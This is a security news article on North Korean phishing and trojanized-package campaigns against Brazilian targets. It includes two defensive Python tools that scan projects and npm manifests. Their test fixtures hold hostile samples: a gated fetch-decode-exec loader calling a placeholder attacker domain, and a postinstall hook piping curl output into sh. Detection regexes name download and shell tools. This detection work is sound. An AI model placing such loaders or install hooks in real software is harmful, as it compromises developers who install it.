North Korean hackers are targeting Brazilian fintech with sophisticated phishing tactics

North Korea-related threat actors have accounted for a third of all phishing activity against Brazil since 2020, as the country’s emergence as an influential power has attracted the attention of cyber espionage groups.

“Actors supported by the North Korean government have targeted the Brazilian government and Brazil’s aerospace, technology and financial services sectors,” Google’s Mandiant and Threat Analysis Group (TAG) divisions said in a joint report released this week.

“Similar to their targeting interests in other regions, cryptocurrency and financial technology companies have been the focus of attention, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.”

Among these groups stands out a threat actor identified as UNC4899 (aka Jade Sleet, PUKCHONG, and TraderTraitor), which targeted cryptocurrency professionals with a Trojanized Python app packed with malware.

The attack chains involve reaching out to potential targets via social media and sending a benign PDF document containing a job description for a purported job opportunity at a well-known cryptocurrency company.

If the victim expresses interest in the job posting, the threat actor sends a second harmless PDF document with a skills questionnaire and instructions for completing a coding assignment by downloading a project from GitHub.

“The project was a Trojanized Python app for retrieving cryptocurrency prices that was modified to reach an attacker-controlled domain to retrieve a second-stage payload if specific conditions were met,” Mandiant and TAG researchers said.
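The pattern described above, a project that looks like a price fetcher but reaches out to a remote host and runs whatever comes back once a gating condition holds, is something a developer can triage statically before running an unsolicited "assignment". The following is an added example written for this article, not code from the Mandiant/TAG report or any real sample: it walks a directory of `.py` files, classifies calls into fetch, exec and decode sinks with the `ast` module, and flags any file where a fetch and an exec sink both occur. The two sample files and the `attacker-domain.invalid` placeholder are constructed for the demo.

```python
"""Static triage of a Python project received as a "coding assignment".

Added example (not code from the Mandiant/TAG report or any real sample): it
flags the shape the report describes, a network fetch whose result reaches a
dynamic-execution sink (exec/eval/compile or a subprocess call), often via a
decode step. Both sample files are constructed; the domain is a placeholder.
"""
import ast
import os
import tempfile

FETCH_ATTRS = {"urlopen", "urlretrieve"}              # urllib.request.urlopen(...)
HTTP_CLIENTS = {"requests", "httpx"}                   # requests.get(...), httpx.post(...)
EXEC_BUILTINS = {"exec", "eval", "compile"}            # bare builtins
PROCESS_MODULES = {"subprocess", "os"}                 # subprocess.run(...), os.system(...)
PROCESS_ATTRS = {"run", "Popen", "call", "check_output", "system", "startfile"}
DECODE_ATTRS = {"b64decode", "decompress"}             # base64.b64decode, zlib.decompress


def _classify_call(call):
    """Return 'fetch', 'exec', 'decode' or None for one ast.Call node."""
    func = call.func
    if isinstance(func, ast.Name):
        return "exec" if func.id in EXEC_BUILTINS else None
    if not isinstance(func, ast.Attribute):
        return None
    base = func.value                                  # module/object the attribute hangs off
    base = base.id if isinstance(base, ast.Name) else getattr(base, "attr", "")
    if func.attr in FETCH_ATTRS or (base in HTTP_CLIENTS and func.attr in {"get", "post"}):
        return "fetch"
    if base in PROCESS_MODULES and func.attr in PROCESS_ATTRS:   # platform.system() is not flagged
        return "exec"
    if func.attr in DECODE_ATTRS:
        return "decode"
    return None


def scan_source(source, filename="<string>"):
    """Classify every call in one file; 'suspicious' means fetch and exec both occur."""
    result = {"file": filename, "fetch": [], "exec": [], "decode": [], "suspicious": False}
    try:
        tree = ast.parse(source, filename=filename)
    except SyntaxError:
        result["unparseable"] = True                   # review by hand; do not run it
        return result
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            kind = _classify_call(node)
            if kind:
                result[kind].append(node.lineno)
    for key in ("fetch", "exec", "decode"):
        result[key] = sorted(set(result[key]))
    result["suspicious"] = bool(result["fetch"] and result["exec"])
    return result


def scan_directory(root):
    """Scan every .py file under root and return only the suspicious results."""
    flagged = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    res = scan_source(fh.read(), filename=os.path.relpath(path, root))
                if res["suspicious"]:
                    flagged.append(res)
    return flagged


# Constructed samples: a gated fetch-decode-exec stage loader and a plain price client.
SUSPICIOUS_SAMPLE = '''
import base64, platform
import urllib.request

def prices():
    return {"BTC": 1}

if platform.system() == "Windows":   # gating condition, as the report describes
    data = urllib.request.urlopen("https://attacker-domain.invalid/stage2").read()
    exec(base64.b64decode(data))
'''

BENIGN_SAMPLE = '''
import requests

def prices(symbol):
    r = requests.get("https://api.example.com/price/" + symbol)
    return r.json()
'''


def demo():
    """Write both samples to a temp dir, scan it, return the flagged file names."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "price_fetcher.py"), "w") as fh:
            fh.write(SUSPICIOUS_SAMPLE)
        with open(os.path.join(tmp, "client.py"), "w") as fh:
            fh.write(BENIGN_SAMPLE)
        return sorted(r["file"] for r in scan_directory(tmp))
```

This is a triage heuristic, not a verdict: a benign client that only fetches is reported with an empty `exec` list, and the conditional gate is exactly why running the project in a sandbox on the wrong platform may show nothing. Files that fail to parse are marked `unparseable` so they get read by hand rather than executed.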

This isn’t the first time UNC4899, to which the 2023 JumpCloud hack has been attributed, has used this approach. In July 2023, GitHub warned of a social engineering attack that attempted to trick employees working at blockchain, cryptocurrency, online gambling, and cybersecurity companies into running code hosted in a GitHub repository that used bogus npm packages.

Work-themed social engineering campaigns are a recurring theme among North Korean hacking groups, with the tech giant also spotting a campaign orchestrated by a group it monitors as PAEKTUSAN to deliver a C++ downloader malware called AGAMEMNON via Microsoft Word attachments embedded in phishing emails.

“In one example, PAEKTUSAN created an account impersonating a human resources director at a Brazilian aerospace company and used it to send phishing emails to employees of a second Brazilian aerospace company,” the researchers noted, adding that campaigns are consistent with a long-lasting activity tracked as Operation Dream Job.

“In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major U.S. aerospace company and contacted professionals in Brazil and other regions via email and social media about potential job opportunities.”

Google also said it blocked attempts by another North Korean group dubbed PRONTO to target diplomats with denuclearization- and news-themed lures designed to get them to visit credential-harvesting pages or enter their login information to view a purported PDF document.

The development comes weeks after Microsoft shed light on a previously undocumented threat actor of North Korean origin, codenamed Moonstone Sleet, which has singled out individuals and organizations in the software and information technology, education and defense sectors with both ransomware and espionage attacks.

Among Moonstone Sleet’s notable tactics is malware distribution through spoofed npm packages published on the npm registry, mirroring that of UNC4899. That said, the packages associated with the two clusters carry distinct code styles and structures.

“The Jade Sleet packages, discovered during the summer of 2023, were… designed to work in pairs, with each pair published by a separate npm user account to distribute its malicious functionality,” Checkmarx researchers Tzachi Zornstein and Yehuda Gelb said.

“In contrast, packages released in late 2023 and early 2024 took a leaner, single-package approach that ran their payload immediately upon installation. In Q2 2024, packages increased in complexity, with attackers adding obfuscation and also targeting Linux systems.”

Regardless of the differences, the tactic abuses the trust users place in open source repositories, allowing threat actors to reach a broader audience and increasing the likelihood that one of their malicious packages could be inadvertently installed by unwitting developers.
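A package that "ran their payload immediately upon installation", as the Checkmarx researchers describe, does so through an npm lifecycle hook (`preinstall`, `install`, `postinstall`, `prepare`) in its `package.json`. The following is an added example written for this article, not Checkmarx's or Microsoft's tooling: it parses a manifest, lists every install-time hook, and flags commands that download content, run inline JavaScript, decode data, pipe into an interpreter or spawn a process. The three manifests and the `attacker-domain.invalid` placeholder are constructed for the demo.

```python
"""Audit an npm package manifest for install-time lifecycle scripts.

Added example, not Checkmarx's or Microsoft's tooling: the article says the
later packages ran their payload immediately upon installation, which in npm
means a preinstall/install/postinstall/prepare hook in package.json. This lists
such hooks and flags commands that download, decode, pipe into an interpreter
or spawn a process. The manifests below are constructed; the domain is a placeholder.
"""
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
RISKY_PATTERNS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b"), "downloads content"),
    (re.compile(r"\bnode\s+-e\b"), "runs inline JavaScript"),
    (re.compile(r"\b(base64|atob|Buffer\.from)\b"), "decodes encoded data"),
    (re.compile(r"\|\s*(sh|bash|powershell|node)\b"), "pipes into an interpreter"),
    (re.compile(r"\bchild_process\b|\bexec\("), "spawns a process"),
]


def audit_manifest(manifest_text):
    """Return one entry per install-time hook: {'hook', 'command', 'reasons'}."""
    scripts = json.loads(manifest_text).get("scripts") or {}
    report = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        reasons = [why for pat, why in RISKY_PATTERNS if pat.search(cmd)]
        report.append({"hook": hook, "command": cmd, "reasons": reasons})
    return report


def is_suspicious(manifest_text):
    """True when any install-time hook matches at least one risky pattern."""
    return any(entry["reasons"] for entry in audit_manifest(manifest_text))


# Constructed manifests: a loader disguised as a price helper, a hook with no
# pattern hit that still runs code at install (read scripts/setup.js by hand),
# and a clean package with no install-time hooks at all.
MALICIOUS_MANIFEST = json.dumps({
    "name": "crypto-price-helper", "version": "1.0.2",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec('curl -s https://attacker-domain.invalid/s | sh')\"",
        "test": "jest",
    },
})
GRAY_MANIFEST = json.dumps({
    "name": "price-widget", "version": "2.0.0",
    "scripts": {"postinstall": "node scripts/setup.js", "test": "jest"},
})
CLEAN_MANIFEST = json.dumps({
    "name": "price-formatter", "version": "0.3.1",
    "scripts": {"build": "tsc", "test": "jest"},
})
```

The patterns are indicators, not proof; the point of the audit is that every install-time hook gets listed, including the `GRAY_MANIFEST` one whose `scripts/setup.js` must be read before installing. For projects received from an unverified contact, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents these hooks from running at all, which removes the install-time execution path this campaign relies on.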

The revelation is significant, not least because it marks an expansion of Moonstone Sleet’s malware distribution mechanism, which previously relied on spreading fake npm packages using LinkedIn and freelancer websites.

The findings also follow the discovery of a new social engineering campaign undertaken by the North Korea-linked Kimsuky group, in which it reportedly impersonated the Reuters news agency to target North Korean human rights activists and spread information-stealing malware under the guise of an interview request, according to Genians.
